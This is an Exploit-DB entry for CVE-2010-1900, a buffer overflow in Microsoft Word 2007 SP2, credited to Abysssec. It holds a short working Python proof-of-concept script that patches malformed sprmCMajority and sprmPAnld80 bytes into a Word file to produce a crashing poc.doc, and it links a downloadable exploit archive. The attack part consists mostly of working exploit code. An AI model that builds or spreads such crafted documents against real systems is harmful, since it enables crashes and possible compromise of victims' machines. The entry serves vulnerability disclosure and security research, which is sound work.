Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow

EDB-ID:

14971

CVE:

2010-1900

EDB Verified:

Author:

Abysssec

Type:

dos

Exploit: /

Platform:

Windows

Date:

2010-09-11

Vulnerable App:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip)
'''

'''
  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900

'''

import sys

def main():
   
    try:
		fdR = open('src.doc', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:4082]
		str2 = strTotal[4088:]
		
		sprmCMajority = "\x47\xCA\xFF"    # sprmCMajority  
		sprmPAnld80 = "\x3E\xC6\xFF"    # sprmPAnld80
				
		fdW= open('poc.doc', 'wb+')
		fdW.write(str1)
		fdW.write(sprmCMajority)
		fdW.write(sprmPAnld80)				
		fdW.write(str2)
		
		fdW.close()
		fdR.close()
		print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == '__main__':
    main()

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services